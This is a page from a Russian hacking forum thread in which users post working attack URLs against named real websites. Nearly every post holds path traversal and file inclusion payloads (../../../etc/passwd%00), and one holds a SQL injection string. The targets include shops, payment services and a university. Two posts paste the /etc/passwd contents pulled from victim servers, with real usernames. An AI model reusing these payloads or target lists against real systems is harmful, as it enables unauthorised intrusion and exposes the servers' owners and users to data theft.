ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #611  
Старый 29.02.2008, 23:36
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Решил сюда запостить

http://www.cosmotech.info/index.php?page=-5+union+select+1,'/etc/passwd',3,4,version()
 
Ответить с цитированием

  #612  
Старый 01.03.2008, 05:17
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.drg.irp.com/cgi-bin/webplus.exe?Script=../../../etc/passwd

http://www.irpsys.com/cgi-bin/webplus.exe?script=/../../../../etc/passwd
 
Ответить с цитированием

  #613  
Старый 02.03.2008, 19:21
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Код:
http://www.oksybox.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00
http://www.a-f-a24.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00

Последний раз редактировалось ~!DoK_tOR!~; 02.03.2008 в 19:23..
 
Ответить с цитированием

  #614  
Старый 03.03.2008, 13:18
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

http://www.dbzhevan.net/main.php?id=../../../etc/passwd
в исходнике
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:12:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ident:x:98:98::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
rob:x:501:501::/home/rob:/bin/bash
matt:x:502:502::/home/matt:/bin/bash
cody:x:503:503::/home/cody:/bin/bash
dan:x:505:505::/home/dan:/bin/bash
ben:x:506:506::/home/ben:/bin/bash
rick:x:508:508::/home/rick:/bin/bash
shawn:x:510:510::/home/shawn:/bin/bash
alligosh:x:498:498::/home/alligosh:/bin/bash
dhandy:x:497:497::/home/dhandy:/bin/bash
spencer:x:496:496::/home/spencer:/bin/bash
mike:x:489:489::/home/mike:/bin/bash
sean:x:488:488::/home/sean:/bin/bash
paul:x:485:499::/home/paul:/bin/bash
robert:x:471:471::/home/robert:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:15:11:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:507:507::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:509:509::/usr/local/cpanel:/bin/bash
americb0:x:513:514::/home/americb0:/bin/noshell
laptopen:x:514:515::/home/laptopen:/bin/noshell
jarosikc:x:517:518::/home/jarosikc:/bin/noshell
shoppin1:x:518:519::/home/shoppin1:/bin/noshell
teammohc:x:519:520::/home/teammohc:/bin/noshell
specialt:x:520:521::/home/specialt:/bin/noshell
jamessha:x:522:523::/home/jamessha:/bin/noshell
infoisus:x:525:526::/home/infoisus:/bin/noshell
highbarc:x:527:528::/home/highbarc:/bin/noshell
solmannc:x:529:530::/home/solmannc:/bin/noshell
baytechw:x:530:531::/home/baytechw:/bin/noshell
sukawati:x:533:534::/home/sukawati:/bin/noshell
securebu:x:534:535::/home/securebu:/bin/noshell
lyonsfal:x:535:536::/home/lyonsfal:/bin/noshell
postjobs:x:537:538::/home/postjobs:/bin/bash
stspporg:x:538:539::/home/stspporg:/bin/noshell
apicalsc:x:539:540::/home/apicalsc:/bin/noshell
hydaddsc:x:540:541::/home/hydaddsc:/bin/noshell
trustyne:x:541:542::/home/trustyne:/bin/noshell
akindwor:x:542:543::/home/akindwor:/bin/noshell
fairelea:x:543:544::/home/fairelea:/bin/noshell
deafspar:x:544:545::/home/deafspar:/bin/noshell
epgroupf:x:545:546::/home/epgroupf:/bin/noshell
и так далее
 
Ответить с цитированием

  #615  
Старый 03.03.2008, 19:13
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

Итак, Вот что я сегодня накопал
http://www.cyprus-directory.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://duitsland-vakantieland.nl/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://www.earrs.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/

http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://www.goqueer.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://incrediblebears.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

http://www.louisvillenews.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://macondo.virtualave.net/cgi-bin/general/tseekdir.cgi?location=/etc/passwd%00

http://www.markenshop-portal.de/cgi-bin/tseekdir.cgi?location=/etc/passwd%00


в гугле проверял, вроде таких же язв нету
Античату респект

Последний раз редактировалось neon_fx; 03.03.2008 в 19:16..
 
Ответить с цитированием

  #616  
Старый 03.03.2008, 20:13
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

http://www.officesystems.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.exyucaffe.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.liceoleonardogiarre.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.zavisni.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #617  
Старый 05.03.2008, 21:50
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Linuxcrow.unixbsd.info2.6.9-55.0.12.ELsmp#1 SMP Fri Nov 2 11:19:08 EDT 2007i686

Цитата:
http://istjuanpabloii.org/portal/iframe.php?file=[remote вжепь ебрило]
=)
 
Ответить с цитированием

  #618  
Старый 05.03.2008, 22:52
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://vnkatonak.com/autohtml.php?filename=../../../../../../etc/passwd

http://www.ke-f.org/autohtml.php?filename=../../../../../../etc/passwd


Порносайтец
http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://www.fund-africa.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.wesways.net/index.php?read=../../../../../../../../../../../../../etc/passwd

http://cybertaka.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.createbusiness.biz/paypal/index.php?read=../../../../../../../../../../../../../etc/passwd

http://iprobill.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://pagoquick.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://worldpayme.com/index.php?read=../../../../../../../../../../../../../etc/passwd

Банк какойто
http://globalbizbank.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.bitzone.co.uk/index.php?read=../../../../../../../../../../../../../etc/passwd

http://scenepay.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.payrupees.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.extreme-pay.com/index.php?read=../../../../../../../../../../../../../etc/passwd

Последний раз редактировалось neon_fx; 06.03.2008 в 04:15..
 
Ответить с цитированием

  #619  
Старый 06.03.2008, 20:44
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

we.mtu.edu
__http://www.we.mtu.edu/faq.php?which=../../../../../../etc/passwd%00

Цитата:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
 
Ответить с цитированием

  #620  
Старый 06.03.2008, 21:46
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

Можно и без самих логов ИМХО
если каждый лог вылаживать то в топике такой бардак будет

тем более он не несет кокой то интересной инфы
ну это только мое мнение

//******************************************

Всем привет
ище одна бессонная ночь закончилать вроде бы хорошим результатом

Цитата:
http://www.pyrexglasstoys.com/cgi-bin/store/index.cgi?page=../../../../../../etc/passwd
http://www.fabulousfoods.com/cgi-bin/store/index.cgi?page=../../../../../../../../../../../etc/passwd
http://www.cravingcandie.com/cgi-bin/store/index.cgi?page=../../../../../../../../../../../etc/passwd
http://www.cidneydiamond.com/cgi-bin/store/index.cgi?page=../../../../../../../../../../../etc/passwd
http://www.giftarmenia.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.bikinideals.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.barnfabriccenter.com/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.nicedaymusic.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.allstargiftbaskets.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.heavens-stone.com/cgi-bin/jewelry/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.jewelry90210.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
Ну по крайней мере баян не наблюдается
И деньги на инет заканчиваются :-)))
Античат респект

ааааа
и еще одно :
Цитата:
http://www.cncnews.org/index.php?files=../../../boot.ini

Последний раз редактировалось neon_fx; 07.03.2008 в 12:37..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ